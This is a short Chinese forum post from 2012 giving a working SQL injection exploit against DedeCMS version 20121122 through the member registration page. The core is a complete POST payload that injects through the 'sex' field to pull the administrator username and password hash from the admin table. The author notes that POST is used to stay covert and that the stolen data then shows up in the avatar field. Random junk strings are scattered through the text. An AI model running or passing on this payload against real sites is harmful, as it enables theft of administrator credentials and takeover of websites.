dedecms版本 20121122' b, O: Z$ [/ ?$ u1 |6 ~
- c* Y* E! p/ r5 P/ Y需要magic_quotes_gpc=Off
" I1 f% X' w# R% |; _. U+ \' G! N
5 f$ e+ R+ }. ~7 N$ v7 E应该是没有什么大危害的漏洞.3 ?4 ~/ V' z. U0 k+ H
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.% `5 }, I+ P6 s! |- M
- m$ i6 m; B$ t0 b$ n8 I+ Q6 s是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
! G5 M* a9 J6 i* ]7 Z, F5 bPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
: ]# B: |4 a* e' C* v+ ^1 a
, p8 n" n1 Q5 M9 n9 Ehttp:///de/member/reg_new.php
4 T8 Z% g# D0 E+ U4 E5 c. u4 J0 e6 A/ G& Y
POST
( |& G( G3 ^: Z5 ?/ R7 \, R" y" p7 Q
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
- r% H6 C. }5 Z* U3 {5 W0 V7 [/ \. v( `
成功注册后,头像处里面有好玩的信息., J5 z8 }( c) i* G
1 K1 A7 O2 W1 d: _& g% \ |
发表于 2012-12-5 10:03:32
收藏
支持
反对